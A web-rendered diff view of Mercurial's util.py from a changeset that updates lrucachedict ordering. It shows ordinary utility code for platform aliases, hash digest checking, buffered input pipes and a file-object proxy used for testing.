##// END OF EJS Templates
util: update lrucachedict order during get()...
Gregory Szorc -
r39607:8f2c0d1b default
parent child Browse files
Show More
@@ -1,3988 +1,3988
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def bitsfrom(container):
138 def bitsfrom(container):
139 bits = 0
139 bits = 0
140 for bit in container:
140 for bit in container:
141 bits |= bit
141 bits |= bit
142 return bits
142 return bits
143
143
144 # python 2.6 still have deprecation warning enabled by default. We do not want
144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # to display anything to standard user so detect if we are running test and
145 # to display anything to standard user so detect if we are running test and
146 # only use python deprecation warning in this case.
146 # only use python deprecation warning in this case.
147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 if _dowarn:
148 if _dowarn:
149 # explicitly unfilter our warning for python 2.7
149 # explicitly unfilter our warning for python 2.7
150 #
150 #
151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # However, module name set through PYTHONWARNINGS was exactly matched, so
152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 if _dowarn and pycompat.ispy3:
158 if _dowarn and pycompat.ispy3:
159 # silence warning emitted by passing user string to re.sub()
159 # silence warning emitted by passing user string to re.sub()
160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 r'mercurial')
161 r'mercurial')
162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 DeprecationWarning, r'mercurial')
163 DeprecationWarning, r'mercurial')
164 # TODO: reinvent imp.is_frozen()
164 # TODO: reinvent imp.is_frozen()
165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 DeprecationWarning, r'mercurial')
166 DeprecationWarning, r'mercurial')
167
167
168 def nouideprecwarn(msg, version, stacklevel=1):
168 def nouideprecwarn(msg, version, stacklevel=1):
169 """Issue an python native deprecation warning
169 """Issue an python native deprecation warning
170
170
171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 """
172 """
173 if _dowarn:
173 if _dowarn:
174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 " update your code.)") % version
175 " update your code.)") % version
176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177
177
178 DIGESTS = {
178 DIGESTS = {
179 'md5': hashlib.md5,
179 'md5': hashlib.md5,
180 'sha1': hashlib.sha1,
180 'sha1': hashlib.sha1,
181 'sha512': hashlib.sha512,
181 'sha512': hashlib.sha512,
182 }
182 }
183 # List of digest types from strongest to weakest
183 # List of digest types from strongest to weakest
184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185
185
186 for k in DIGESTS_BY_STRENGTH:
186 for k in DIGESTS_BY_STRENGTH:
187 assert k in DIGESTS
187 assert k in DIGESTS
188
188
189 class digester(object):
189 class digester(object):
190 """helper to compute digests.
190 """helper to compute digests.
191
191
192 This helper can be used to compute one or more digests given their name.
192 This helper can be used to compute one or more digests given their name.
193
193
194 >>> d = digester([b'md5', b'sha1'])
194 >>> d = digester([b'md5', b'sha1'])
195 >>> d.update(b'foo')
195 >>> d.update(b'foo')
196 >>> [k for k in sorted(d)]
196 >>> [k for k in sorted(d)]
197 ['md5', 'sha1']
197 ['md5', 'sha1']
198 >>> d[b'md5']
198 >>> d[b'md5']
199 'acbd18db4cc2f85cedef654fccc4a4d8'
199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 >>> d[b'sha1']
200 >>> d[b'sha1']
201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 >>> digester.preferred([b'md5', b'sha1'])
202 >>> digester.preferred([b'md5', b'sha1'])
203 'sha1'
203 'sha1'
204 """
204 """
205
205
206 def __init__(self, digests, s=''):
206 def __init__(self, digests, s=''):
207 self._hashes = {}
207 self._hashes = {}
208 for k in digests:
208 for k in digests:
209 if k not in DIGESTS:
209 if k not in DIGESTS:
210 raise error.Abort(_('unknown digest type: %s') % k)
210 raise error.Abort(_('unknown digest type: %s') % k)
211 self._hashes[k] = DIGESTS[k]()
211 self._hashes[k] = DIGESTS[k]()
212 if s:
212 if s:
213 self.update(s)
213 self.update(s)
214
214
215 def update(self, data):
215 def update(self, data):
216 for h in self._hashes.values():
216 for h in self._hashes.values():
217 h.update(data)
217 h.update(data)
218
218
219 def __getitem__(self, key):
219 def __getitem__(self, key):
220 if key not in DIGESTS:
220 if key not in DIGESTS:
221 raise error.Abort(_('unknown digest type: %s') % k)
221 raise error.Abort(_('unknown digest type: %s') % k)
222 return nodemod.hex(self._hashes[key].digest())
222 return nodemod.hex(self._hashes[key].digest())
223
223
224 def __iter__(self):
224 def __iter__(self):
225 return iter(self._hashes)
225 return iter(self._hashes)
226
226
227 @staticmethod
227 @staticmethod
228 def preferred(supported):
228 def preferred(supported):
229 """returns the strongest digest type in both supported and DIGESTS."""
229 """returns the strongest digest type in both supported and DIGESTS."""
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 if k in supported:
232 if k in supported:
233 return k
233 return k
234 return None
234 return None
235
235
236 class digestchecker(object):
236 class digestchecker(object):
237 """file handle wrapper that additionally checks content against a given
237 """file handle wrapper that additionally checks content against a given
238 size and digests.
238 size and digests.
239
239
240 d = digestchecker(fh, size, {'md5': '...'})
240 d = digestchecker(fh, size, {'md5': '...'})
241
241
242 When multiple digests are given, all of them are validated.
242 When multiple digests are given, all of them are validated.
243 """
243 """
244
244
245 def __init__(self, fh, size, digests):
245 def __init__(self, fh, size, digests):
246 self._fh = fh
246 self._fh = fh
247 self._size = size
247 self._size = size
248 self._got = 0
248 self._got = 0
249 self._digests = dict(digests)
249 self._digests = dict(digests)
250 self._digester = digester(self._digests.keys())
250 self._digester = digester(self._digests.keys())
251
251
252 def read(self, length=-1):
252 def read(self, length=-1):
253 content = self._fh.read(length)
253 content = self._fh.read(length)
254 self._digester.update(content)
254 self._digester.update(content)
255 self._got += len(content)
255 self._got += len(content)
256 return content
256 return content
257
257
258 def validate(self):
258 def validate(self):
259 if self._size != self._got:
259 if self._size != self._got:
260 raise error.Abort(_('size mismatch: expected %d, got %d') %
260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 (self._size, self._got))
261 (self._size, self._got))
262 for k, v in self._digests.items():
262 for k, v in self._digests.items():
263 if v != self._digester[k]:
263 if v != self._digester[k]:
264 # i18n: first parameter is a digest name
264 # i18n: first parameter is a digest name
265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 (k, v, self._digester[k]))
266 (k, v, self._digester[k]))
267
267
268 try:
268 try:
269 buffer = buffer
269 buffer = buffer
270 except NameError:
270 except NameError:
271 def buffer(sliceable, offset=0, length=None):
271 def buffer(sliceable, offset=0, length=None):
272 if length is not None:
272 if length is not None:
273 return memoryview(sliceable)[offset:offset + length]
273 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:]
274 return memoryview(sliceable)[offset:]
275
275
276 _chunksize = 4096
276 _chunksize = 4096
277
277
278 class bufferedinputpipe(object):
278 class bufferedinputpipe(object):
279 """a manually buffered input pipe
279 """a manually buffered input pipe
280
280
281 Python will not let us use buffered IO and lazy reading with 'polling' at
281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 the same time. We cannot probe the buffer state and select will not detect
282 the same time. We cannot probe the buffer state and select will not detect
283 that data are ready to read if they are already buffered.
283 that data are ready to read if they are already buffered.
284
284
285 This class let us work around that by implementing its own buffering
285 This class let us work around that by implementing its own buffering
286 (allowing efficient readline) while offering a way to know if the buffer is
286 (allowing efficient readline) while offering a way to know if the buffer is
287 empty from the output (allowing collaboration of the buffer with polling).
287 empty from the output (allowing collaboration of the buffer with polling).
288
288
289 This class lives in the 'util' module because it makes use of the 'os'
289 This class lives in the 'util' module because it makes use of the 'os'
290 module from the python stdlib.
290 module from the python stdlib.
291 """
291 """
292 def __new__(cls, fh):
292 def __new__(cls, fh):
293 # If we receive a fileobjectproxy, we need to use a variation of this
293 # If we receive a fileobjectproxy, we need to use a variation of this
294 # class that notifies observers about activity.
294 # class that notifies observers about activity.
295 if isinstance(fh, fileobjectproxy):
295 if isinstance(fh, fileobjectproxy):
296 cls = observedbufferedinputpipe
296 cls = observedbufferedinputpipe
297
297
298 return super(bufferedinputpipe, cls).__new__(cls)
298 return super(bufferedinputpipe, cls).__new__(cls)
299
299
300 def __init__(self, input):
300 def __init__(self, input):
301 self._input = input
301 self._input = input
302 self._buffer = []
302 self._buffer = []
303 self._eof = False
303 self._eof = False
304 self._lenbuf = 0
304 self._lenbuf = 0
305
305
306 @property
306 @property
307 def hasbuffer(self):
307 def hasbuffer(self):
308 """True is any data is currently buffered
308 """True is any data is currently buffered
309
309
310 This will be used externally a pre-step for polling IO. If there is
310 This will be used externally a pre-step for polling IO. If there is
311 already data then no polling should be set in place."""
311 already data then no polling should be set in place."""
312 return bool(self._buffer)
312 return bool(self._buffer)
313
313
314 @property
314 @property
315 def closed(self):
315 def closed(self):
316 return self._input.closed
316 return self._input.closed
317
317
318 def fileno(self):
318 def fileno(self):
319 return self._input.fileno()
319 return self._input.fileno()
320
320
321 def close(self):
321 def close(self):
322 return self._input.close()
322 return self._input.close()
323
323
324 def read(self, size):
324 def read(self, size):
325 while (not self._eof) and (self._lenbuf < size):
325 while (not self._eof) and (self._lenbuf < size):
326 self._fillbuffer()
326 self._fillbuffer()
327 return self._frombuffer(size)
327 return self._frombuffer(size)
328
328
329 def unbufferedread(self, size):
329 def unbufferedread(self, size):
330 if not self._eof and self._lenbuf == 0:
330 if not self._eof and self._lenbuf == 0:
331 self._fillbuffer(max(size, _chunksize))
331 self._fillbuffer(max(size, _chunksize))
332 return self._frombuffer(min(self._lenbuf, size))
332 return self._frombuffer(min(self._lenbuf, size))
333
333
334 def readline(self, *args, **kwargs):
334 def readline(self, *args, **kwargs):
335 if 1 < len(self._buffer):
335 if 1 < len(self._buffer):
336 # this should not happen because both read and readline end with a
336 # this should not happen because both read and readline end with a
337 # _frombuffer call that collapse it.
337 # _frombuffer call that collapse it.
338 self._buffer = [''.join(self._buffer)]
338 self._buffer = [''.join(self._buffer)]
339 self._lenbuf = len(self._buffer[0])
339 self._lenbuf = len(self._buffer[0])
340 lfi = -1
340 lfi = -1
341 if self._buffer:
341 if self._buffer:
342 lfi = self._buffer[-1].find('\n')
342 lfi = self._buffer[-1].find('\n')
343 while (not self._eof) and lfi < 0:
343 while (not self._eof) and lfi < 0:
344 self._fillbuffer()
344 self._fillbuffer()
345 if self._buffer:
345 if self._buffer:
346 lfi = self._buffer[-1].find('\n')
346 lfi = self._buffer[-1].find('\n')
347 size = lfi + 1
347 size = lfi + 1
348 if lfi < 0: # end of file
348 if lfi < 0: # end of file
349 size = self._lenbuf
349 size = self._lenbuf
350 elif 1 < len(self._buffer):
350 elif 1 < len(self._buffer):
351 # we need to take previous chunks into account
351 # we need to take previous chunks into account
352 size += self._lenbuf - len(self._buffer[-1])
352 size += self._lenbuf - len(self._buffer[-1])
353 return self._frombuffer(size)
353 return self._frombuffer(size)
354
354
355 def _frombuffer(self, size):
355 def _frombuffer(self, size):
356 """return at most 'size' data from the buffer
356 """return at most 'size' data from the buffer
357
357
358 The data are removed from the buffer."""
358 The data are removed from the buffer."""
359 if size == 0 or not self._buffer:
359 if size == 0 or not self._buffer:
360 return ''
360 return ''
361 buf = self._buffer[0]
361 buf = self._buffer[0]
362 if 1 < len(self._buffer):
362 if 1 < len(self._buffer):
363 buf = ''.join(self._buffer)
363 buf = ''.join(self._buffer)
364
364
365 data = buf[:size]
365 data = buf[:size]
366 buf = buf[len(data):]
366 buf = buf[len(data):]
367 if buf:
367 if buf:
368 self._buffer = [buf]
368 self._buffer = [buf]
369 self._lenbuf = len(buf)
369 self._lenbuf = len(buf)
370 else:
370 else:
371 self._buffer = []
371 self._buffer = []
372 self._lenbuf = 0
372 self._lenbuf = 0
373 return data
373 return data
374
374
375 def _fillbuffer(self, size=_chunksize):
375 def _fillbuffer(self, size=_chunksize):
376 """read data to the buffer"""
376 """read data to the buffer"""
377 data = os.read(self._input.fileno(), size)
377 data = os.read(self._input.fileno(), size)
378 if not data:
378 if not data:
379 self._eof = True
379 self._eof = True
380 else:
380 else:
381 self._lenbuf += len(data)
381 self._lenbuf += len(data)
382 self._buffer.append(data)
382 self._buffer.append(data)
383
383
384 return data
384 return data
385
385
386 def mmapread(fp):
386 def mmapread(fp):
387 try:
387 try:
388 fd = getattr(fp, 'fileno', lambda: fp)()
388 fd = getattr(fp, 'fileno', lambda: fp)()
389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 except ValueError:
390 except ValueError:
391 # Empty files cannot be mmapped, but mmapread should still work. Check
391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # if the file is empty, and if so, return an empty buffer.
392 # if the file is empty, and if so, return an empty buffer.
393 if os.fstat(fd).st_size == 0:
393 if os.fstat(fd).st_size == 0:
394 return ''
394 return ''
395 raise
395 raise
396
396
397 class fileobjectproxy(object):
397 class fileobjectproxy(object):
398 """A proxy around file objects that tells a watcher when events occur.
398 """A proxy around file objects that tells a watcher when events occur.
399
399
400 This type is intended to only be used for testing purposes. Think hard
400 This type is intended to only be used for testing purposes. Think hard
401 before using it in important code.
401 before using it in important code.
402 """
402 """
403 __slots__ = (
403 __slots__ = (
404 r'_orig',
404 r'_orig',
405 r'_observer',
405 r'_observer',
406 )
406 )
407
407
408 def __init__(self, fh, observer):
408 def __init__(self, fh, observer):
409 object.__setattr__(self, r'_orig', fh)
409 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_observer', observer)
410 object.__setattr__(self, r'_observer', observer)
411
411
412 def __getattribute__(self, name):
412 def __getattribute__(self, name):
413 ours = {
413 ours = {
414 r'_observer',
414 r'_observer',
415
415
416 # IOBase
416 # IOBase
417 r'close',
417 r'close',
418 # closed if a property
418 # closed if a property
419 r'fileno',
419 r'fileno',
420 r'flush',
420 r'flush',
421 r'isatty',
421 r'isatty',
422 r'readable',
422 r'readable',
423 r'readline',
423 r'readline',
424 r'readlines',
424 r'readlines',
425 r'seek',
425 r'seek',
426 r'seekable',
426 r'seekable',
427 r'tell',
427 r'tell',
428 r'truncate',
428 r'truncate',
429 r'writable',
429 r'writable',
430 r'writelines',
430 r'writelines',
431 # RawIOBase
431 # RawIOBase
432 r'read',
432 r'read',
433 r'readall',
433 r'readall',
434 r'readinto',
434 r'readinto',
435 r'write',
435 r'write',
436 # BufferedIOBase
436 # BufferedIOBase
437 # raw is a property
437 # raw is a property
438 r'detach',
438 r'detach',
439 # read defined above
439 # read defined above
440 r'read1',
440 r'read1',
441 # readinto defined above
441 # readinto defined above
442 # write defined above
442 # write defined above
443 }
443 }
444
444
445 # We only observe some methods.
445 # We only observe some methods.
446 if name in ours:
446 if name in ours:
447 return object.__getattribute__(self, name)
447 return object.__getattribute__(self, name)
448
448
449 return getattr(object.__getattribute__(self, r'_orig'), name)
449 return getattr(object.__getattribute__(self, r'_orig'), name)
450
450
451 def __nonzero__(self):
451 def __nonzero__(self):
452 return bool(object.__getattribute__(self, r'_orig'))
452 return bool(object.__getattribute__(self, r'_orig'))
453
453
454 __bool__ = __nonzero__
454 __bool__ = __nonzero__
455
455
456 def __delattr__(self, name):
456 def __delattr__(self, name):
457 return delattr(object.__getattribute__(self, r'_orig'), name)
457 return delattr(object.__getattribute__(self, r'_orig'), name)
458
458
459 def __setattr__(self, name, value):
459 def __setattr__(self, name, value):
460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461
461
462 def __iter__(self):
462 def __iter__(self):
463 return object.__getattribute__(self, r'_orig').__iter__()
463 return object.__getattribute__(self, r'_orig').__iter__()
464
464
465 def _observedcall(self, name, *args, **kwargs):
465 def _observedcall(self, name, *args, **kwargs):
466 # Call the original object.
466 # Call the original object.
467 orig = object.__getattribute__(self, r'_orig')
467 orig = object.__getattribute__(self, r'_orig')
468 res = getattr(orig, name)(*args, **kwargs)
468 res = getattr(orig, name)(*args, **kwargs)
469
469
470 # Call a method on the observer of the same name with arguments
470 # Call a method on the observer of the same name with arguments
471 # so it can react, log, etc.
471 # so it can react, log, etc.
472 observer = object.__getattribute__(self, r'_observer')
472 observer = object.__getattribute__(self, r'_observer')
473 fn = getattr(observer, name, None)
473 fn = getattr(observer, name, None)
474 if fn:
474 if fn:
475 fn(res, *args, **kwargs)
475 fn(res, *args, **kwargs)
476
476
477 return res
477 return res
478
478
479 def close(self, *args, **kwargs):
479 def close(self, *args, **kwargs):
480 return object.__getattribute__(self, r'_observedcall')(
480 return object.__getattribute__(self, r'_observedcall')(
481 r'close', *args, **kwargs)
481 r'close', *args, **kwargs)
482
482
483 def fileno(self, *args, **kwargs):
483 def fileno(self, *args, **kwargs):
484 return object.__getattribute__(self, r'_observedcall')(
484 return object.__getattribute__(self, r'_observedcall')(
485 r'fileno', *args, **kwargs)
485 r'fileno', *args, **kwargs)
486
486
487 def flush(self, *args, **kwargs):
487 def flush(self, *args, **kwargs):
488 return object.__getattribute__(self, r'_observedcall')(
488 return object.__getattribute__(self, r'_observedcall')(
489 r'flush', *args, **kwargs)
489 r'flush', *args, **kwargs)
490
490
491 def isatty(self, *args, **kwargs):
491 def isatty(self, *args, **kwargs):
492 return object.__getattribute__(self, r'_observedcall')(
492 return object.__getattribute__(self, r'_observedcall')(
493 r'isatty', *args, **kwargs)
493 r'isatty', *args, **kwargs)
494
494
495 def readable(self, *args, **kwargs):
495 def readable(self, *args, **kwargs):
496 return object.__getattribute__(self, r'_observedcall')(
496 return object.__getattribute__(self, r'_observedcall')(
497 r'readable', *args, **kwargs)
497 r'readable', *args, **kwargs)
498
498
499 def readline(self, *args, **kwargs):
499 def readline(self, *args, **kwargs):
500 return object.__getattribute__(self, r'_observedcall')(
500 return object.__getattribute__(self, r'_observedcall')(
501 r'readline', *args, **kwargs)
501 r'readline', *args, **kwargs)
502
502
503 def readlines(self, *args, **kwargs):
503 def readlines(self, *args, **kwargs):
504 return object.__getattribute__(self, r'_observedcall')(
504 return object.__getattribute__(self, r'_observedcall')(
505 r'readlines', *args, **kwargs)
505 r'readlines', *args, **kwargs)
506
506
507 def seek(self, *args, **kwargs):
507 def seek(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
508 return object.__getattribute__(self, r'_observedcall')(
509 r'seek', *args, **kwargs)
509 r'seek', *args, **kwargs)
510
510
511 def seekable(self, *args, **kwargs):
511 def seekable(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
512 return object.__getattribute__(self, r'_observedcall')(
513 r'seekable', *args, **kwargs)
513 r'seekable', *args, **kwargs)
514
514
515 def tell(self, *args, **kwargs):
515 def tell(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
516 return object.__getattribute__(self, r'_observedcall')(
517 r'tell', *args, **kwargs)
517 r'tell', *args, **kwargs)
518
518
519 def truncate(self, *args, **kwargs):
519 def truncate(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
520 return object.__getattribute__(self, r'_observedcall')(
521 r'truncate', *args, **kwargs)
521 r'truncate', *args, **kwargs)
522
522
523 def writable(self, *args, **kwargs):
523 def writable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
524 return object.__getattribute__(self, r'_observedcall')(
525 r'writable', *args, **kwargs)
525 r'writable', *args, **kwargs)
526
526
527 def writelines(self, *args, **kwargs):
527 def writelines(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
528 return object.__getattribute__(self, r'_observedcall')(
529 r'writelines', *args, **kwargs)
529 r'writelines', *args, **kwargs)
530
530
531 def read(self, *args, **kwargs):
531 def read(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
532 return object.__getattribute__(self, r'_observedcall')(
533 r'read', *args, **kwargs)
533 r'read', *args, **kwargs)
534
534
535 def readall(self, *args, **kwargs):
535 def readall(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
536 return object.__getattribute__(self, r'_observedcall')(
537 r'readall', *args, **kwargs)
537 r'readall', *args, **kwargs)
538
538
539 def readinto(self, *args, **kwargs):
539 def readinto(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
540 return object.__getattribute__(self, r'_observedcall')(
541 r'readinto', *args, **kwargs)
541 r'readinto', *args, **kwargs)
542
542
543 def write(self, *args, **kwargs):
543 def write(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
544 return object.__getattribute__(self, r'_observedcall')(
545 r'write', *args, **kwargs)
545 r'write', *args, **kwargs)
546
546
547 def detach(self, *args, **kwargs):
547 def detach(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
548 return object.__getattribute__(self, r'_observedcall')(
549 r'detach', *args, **kwargs)
549 r'detach', *args, **kwargs)
550
550
551 def read1(self, *args, **kwargs):
551 def read1(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
552 return object.__getattribute__(self, r'_observedcall')(
553 r'read1', *args, **kwargs)
553 r'read1', *args, **kwargs)
554
554
555 class observedbufferedinputpipe(bufferedinputpipe):
555 class observedbufferedinputpipe(bufferedinputpipe):
556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557
557
558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 bypass ``fileobjectproxy``. Because of this, we need to make
559 bypass ``fileobjectproxy``. Because of this, we need to make
560 ``bufferedinputpipe`` aware of these operations.
560 ``bufferedinputpipe`` aware of these operations.
561
561
562 This variation of ``bufferedinputpipe`` can notify observers about
562 This variation of ``bufferedinputpipe`` can notify observers about
563 ``os.read()`` events. It also re-publishes other events, such as
563 ``os.read()`` events. It also re-publishes other events, such as
564 ``read()`` and ``readline()``.
564 ``read()`` and ``readline()``.
565 """
565 """
